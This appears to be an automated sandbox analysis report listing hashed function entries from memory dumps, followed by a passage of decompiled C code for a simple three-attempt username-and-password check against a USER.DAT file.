Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E

Uniqueness

Uniqueness Score: -1.00%

Function 009101D4, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96

Uniqueness

Uniqueness Score: -1.00%

Function 0091010C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00911148, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A

Uniqueness

Uniqueness Score: -1.00%

Function 009107AC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 0090F8CC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697

Uniqueness

Uniqueness Score: -1.00%

Function 00911930, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546

Uniqueness

Uniqueness Score: -1.00%

Function 0090F938, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947

Uniqueness

Uniqueness Score: -1.00%

Function 0090FAB8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 0090FA20, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 0090FA50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 0090FBE8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986

Uniqueness

Uniqueness Score: -1.00%

Function 0090FB50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 0090FC30, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 00910C40, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547

Uniqueness

Uniqueness Score: -1.00%

Function 0090FC48, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456

Uniqueness

Uniqueness Score: -1.00%

Function 00911D80, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686

Uniqueness

Uniqueness Score: -1.00%

Function 0090FD5C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 0090FE24, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456

Uniqueness

Uniqueness Score: -1.00%

Function 0090FFFC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B

Uniqueness

Uniqueness Score: -1.00%

Function 0090FF34, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 012B3610, Relevance: 91.3, APIs: 27, Strings: 25, Instructions: 313
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E012B3610(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v5;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v36;
				char _v39;
				char _v43;
				char _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v68;
				char _v80;
				char _v92;
				char _v124;
				char _v156;
				void* __ebp;
				intOrPtr _t58;
				intOrPtr _t60;
				void* _t61;
				void* _t98;
				void* _t99;
				void* _t108;
				intOrPtr _t111;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t139;
				void* _t148;

				_t148 = __fp0;
				_t122 = __esi;
				_t121 = __edi;
				_t108 = __ebx;
				_v68 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v12 = 0;
				_v20 = 0;
				_v20 = 0;
				do {
					E012B1380(_t121, _t122, 0, 0xa, 8, 0x46, 0xf);
					E012B12B0(7, 5);
					_push("Only THREE attempts shall be allowed to enter username and password.");
					E012B715C(_t108, _t121, _t122, 0);
					E012B12B0(0x17, 0xa);
					_push("Enter User name : ");
					E012B715C(_t108, _t121, _t122, 0);
					E012B738B("%s", 0x12d2ee4);
					E012B12B0(0x17, 0xc);
					_push("Password        : ");
					E012B715C(_t108, _t121, _t122, 0);
					_t127 = _t123 + 0x14;
					E012B12F0(_t121, _t122,  &_v68);
					_v20 = _v20 + 1;
					_t143 = _v20 - 3;
					if(_v20 == 3) {
						E012B20E0( &_v68, _t121, _t122, _t143, _t148);
						E012B12B0(0x19, 0xa);
						_push(0x12cfb98);
						E012B715C(_t108, _t121, _t122, _t143);
						E012B12B0(0x16, 0xc);
						_push("Press ENTER to exit the program...");
						E012B715C(_t108, _t121, _t122, _t143);
						_t127 = _t127 + 8;
						E012B77B1(0);
					}
					_v12 = 0;
					_t58 = E012B6EF1("USER.DAT", "r");
					_t128 = _t127 + 8;
					 *0x12d2f28 = _t58;
					while(1) {
						_push( &_v156);
						_push( &_v124);
						_t60 =  *0x12d2f28; // 0x0
						_t61 = E012B7021(_t60, "%s %s %s\n",  &_v92);
						_t129 = _t128 + 0x14;
						if(_t61 == 0xffffffff) {
							break;
						}
						_t98 = E012B8230(0x12d2ee4,  &_v124);
						_t128 = _t129 + 8;
						if(_t98 == 0) {
							_t99 = E012B8230(0x12d2f02,  &_v156);
							_t128 = _t128 + 8;
							if(_t99 == 0) {
								_v12 = _v12 + 1;
							}
						}
					}
					_t111 =  *0x12d2f28; // 0x0
					_push(_t111);
					E012B6DB6(_t108, _t121, _t122, __eflags);
					_t130 = _t129 + 4;
					E012B20E0(_t111, _t121, _t122, __eflags, _t148);
					__eflags = _v12;
					if(__eflags == 0) {
						goto L10;
					}
					break;
					L10:
					E012B12B0(0xa, 0xa);
					_push(0x12cfbf8);
					E012B715C(_t108, _t121, _t122, __eflags);
					_t123 = _t130 + 4;
					__eflags = 1;
				} while (1 != 0);
				E012B8417(__eflags,  &_v80);
				_t131 = _t130 + 4;
